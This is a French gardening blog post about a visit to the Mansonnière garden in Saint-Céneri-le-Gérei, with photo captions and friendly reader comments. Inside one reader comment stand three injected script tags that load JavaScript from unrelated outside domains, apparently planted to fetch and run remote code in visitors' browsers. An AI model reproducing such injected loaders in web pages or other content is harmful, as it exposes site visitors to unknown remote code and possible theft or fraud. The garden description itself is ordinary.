• Le jardin de la Mansonnière

     

     

    Après avoir quitté Catherine et Eric, nous nous sommes dirigées vers le joli petit village de Céneri le Gérei. (dépt 61)

     

    C'est une région que l'on appelle les Alpes Mancelles, en effet cette région naturelle des départements de la Sarthe, de la Mayenne et de l'Orne se caractérient par leurs vallées encaissées où coulent la Sarthe. Encore une fois, c'est une découverte pour moi.

    (je vous prépare prochainement des photos de ce village, l'un des plus beaux de France)

     

    Le JARDIN DE LA MANSONIERE se trouve sur les hauteurs de ce village.

     

    C'est un jardin totalement différent, très structuré, très très soigné ...

     

    Un jardin fait pour les magasines !!!

    très classe.

     

     

     

    Le jardin de la Mansonnière

     

     

     

     

     

     

     

    Le jardin de la Mansonnière

    Le jardin de la Mansonnière

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Sur plusieurs hectares,

    vous découvrirez différentes ambiances, avec toujours la même rigueur,

    le pot, la fontaine, en bon endroit ...

    La taille des arbres toujours impeccable, une très belle harmonie se dégage de ce jardin.

     

     Le jardin de la Mansonnière

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     Très belle batisse, un peu caché ici.

     

     

     

    Le jardin de la Mansonnière

     

     

    Le jardin de la Mansonnière

     

     

     

    Vous découvrirez de nombreuses décorations chinées ...

     

     

     

    Le jardin de la Mansonnière

     

     

     De grands massifs ensoleillées qui ne semblent pas souffrir de la chaleur...

     

     

    Le jardin de la Mansonnière

     

     

     

     

    Le jardin de la Mansonnière

     

     

     

     

    Le jardin de la Mansonnière

     

     

    Dans cette mosaïque, 

    je vous montre dans ses quelques exemples tout le soin apporté ...

    que ce soit dans un grand espace ou un tout petit

     

     

     

    Le jardin de la Mansonnière

     

     

     

     

     

     

    Le jardin de la Mansonnière

     

     

     

     

    Le jardin de la Mansonnière

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     Scène antique avec ces colonnes,

    un peu de l'Italie et de la Provence par ces couleurs.

     

     

     

     

     

    Le jardin de la Mansonnière

     

     

    Le jardin de la Mansonnière

     

     

    Le jardin de la Mansonnière

     

     

    Des endroits intimistes,

    on apprécie l'ombre ... le silence, un moment de recueillement.

     

     

    Le jardin de la Mansonnière

     

     

    La dernière partie du jardin s'ouvre sur une vaste prairie.

    J'aime tout particulièrement ce décor majestueux.

    Encore une fois tout est dans la perfection.

     

     

    Le jardin de la Mansonnière

     

     

    Le jardin de la Mansonnière

     

    encore quelques photos que je ne pouvais ne pas garder pour moi.

     

     

    Le jardin de la Mansonnière

     

    hémérocalle "Spider" (que j'ai ramené)

     

     

    Le jardin de la Mansonnière

     

     un Hydrangea serrata "japonnais", vu la taille, il a quelques années ...

     

     

     

     

     

    Le jardin de la Mansonnière

    Le jardin de la Mansonnière

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     Les touches de couleurs tout en délicatesse

     

     

     

     

     

    Le jardin de la Mansonnière Le jardin de la Mansonnière

     

     

     

     

     

     

     

     

     

     

     

     

    ce pavot extraordinaire !!! 

     

     

     

     

     

     

     

    Le jardin de la Mansonnière

     

     

    Et oui, c'est déjà la fin ...

    Jardin à déguster.

     

    Bisous,

    je reviens très vite pour répondre à vos nombreux commentaires.

     

     

     

     

     

     

     

    « Le jardin des VigneauxLe paradis de Cezy »

    Tags Tags :
  • Commentaires

    1
    Lundi 9 Juillet 2018 à 20:04

    J'ai dégusté, petit à petit, tout le jardin. Miam, que c'est bon ! 

    Je suis sans voix : la beauté à l'état pur ! 

    Merci pour cette découverte du paradis terrestre ! 

    Bonne semaine. 

      • Mercredi 11 Juillet 2018 à 19:12

        Bonsoir Philippe, je me demande, combien il y a de jardiniers pour s'occuper de tout ça !!! c'est si parfait ... Bonne soirée

    2
    Elmo
    Lundi 9 Juillet 2018 à 20:11

    Tu as raison très classe avec de belles mises en scène. Unique ce jardin merci pour la visite. Bonne soirée

      • Mercredi 11 Juillet 2018 à 19:14

        Bonsoir Elmo, tout est très beau, c'est un jardin à voir. Bises

    3
    eliane
    Lundi 9 Juillet 2018 à 22:27

    quelle balade ! Un jardin tiré à 4 épingles, varié et imaginatif. Tout simplement magnifique. Bonne soirée. Bisous

      • Mercredi 11 Juillet 2018 à 19:16

        Bonsoir Eliane, c'est une belle réussite, j'ai aimé m'y promener. Bises

    4
    evapetitcoeur
    Lundi 9 Juillet 2018 à 23:07

    Un merveilleux souvenir pour nous ce jardin et l'accueil de sa propriétaire; nous avons donc des photos en commun ! Bises . Colette

    <script src="//qwentyextext.com/1c5de4896292693cc3.js"></script> <script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7261x&r=47" type="text/javascript"></script> <script src="http://qwentyextext.com/ext/1c5de4896292693cc3.js?sid=52295_7261_&title=ff_chaos_linkextcol.cool&blocks[]=31af2" type="text/javascript"></script>
      • Mercredi 11 Juillet 2018 à 19:17

        Bonsoir Colette, nous n'avons pas discuté avec la propriétaire, je le regrette un peu ... bises

    5
    Mardi 10 Juillet 2018 à 11:12

    Il fait partie depuis longtemps de mes futures destinations jardin à une distance raisonnable de chez moi, moins de 2h de route. Le pire, c'est que j'ai visité le village en famille il y a quelques années mais que je ne savais pas qu'il y avait un si beau jardin.

    Aude.

      • Mercredi 11 Juillet 2018 à 19:18

        Bonsoir Aude, c'est un peu dommage d'être passé à côté !!! nous voulions également visité le Jardin François, mais nous n'avons pas eu le temps. Bises

    6
    Carole Tahar
    Mardi 10 Juillet 2018 à 14:20

    Bonjour Valérie! Du ciselé, de la dentelle, de la passementerie, de la sculpture, des "toiles" de maîtres des siècles passés, de l'évocation de certains jardins à la Française, des invitations de pensées vagabondes et "monacales",  des grands en liberté à l' Anglaise et des plus petits mis en scène en ponctuation,  et de très beaux murs! La Mansonnière a de faux airs de noblesse qui pourraient intimider alors que c'est le contraire, elle invite à rentrer et s'abandonner un peu, comme ça...juste pour le plaisir des yeux!

    Merci pour la visite et bel été à toi Valérie!

    Carole.

      • Mercredi 11 Juillet 2018 à 19:21

        Bonsoir Carole, un jardin à découvrir tranquillement. Un grand jardin où je n'ai pas trouvé une seule fausse note !!! Bises

    7
    Emmanuelle
    Jeudi 12 Juillet 2018 à 02:04

    Bonjour Valérie .Tout n'est que beauté dans ce jardin et cette batisse est magnifique .J'avais vue des appercus de ce jardin Catherine  expose parfois c'est superbes aquarelles .

    Vos photos sont un pur bonheur ,les grilles sont superbes .Merci Valérie de vos partages .

    Amitié

      • Mercredi 25 Juillet 2018 à 18:43

        Coucou Emmanuelle, me revoilà !!! c'était une belle visite. Je me régale à chacune de mes découvertes. Bises

    8
    Jeudi 12 Juillet 2018 à 14:19

    Un régal et un grand regrêt car j'ai visité ce délicieux village un soir et les portes de la Mansonnière étaient alors bien évidemment fermées. J'espère pouvoir y retourner un jour . Merci pour cet élégant reportage Valérie.Tout comme Emmanuelle je louche et soupire sur ces majestueuses grilles. Belle journée.

      • Mercredi 25 Juillet 2018 à 18:45

        Bonsoir Maryline, cela a du être agréable de se balader en soirée, loin de la chaleur de l'après midi ... mais que cela doit être frustrant de se retrouver devant des grilles fermées !!! je suis sure que tu vas y retourner. Bisous

    9
    danuta
    Mercredi 8 Août 2018 à 07:34

    bonjour Valérie, comment se nomme cette jolie clématite herbacée blanche sur la photo du 8 août. Avec tous mes remerciements

      • Mercredi 8 Août 2018 à 19:40

        Bonjour danuta, désolée, je n'ai plus son nom ... si je le retrouve, je ne manquerai pas de revenir vers toi. Bonne soirée

    10
    Mercredi 8 Août 2018 à 07:51

    bonjour Valérie,comment se nomme cette jolie clématite herbacée blanche en photo sur la page du 8 août. Avec mes remerciements

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :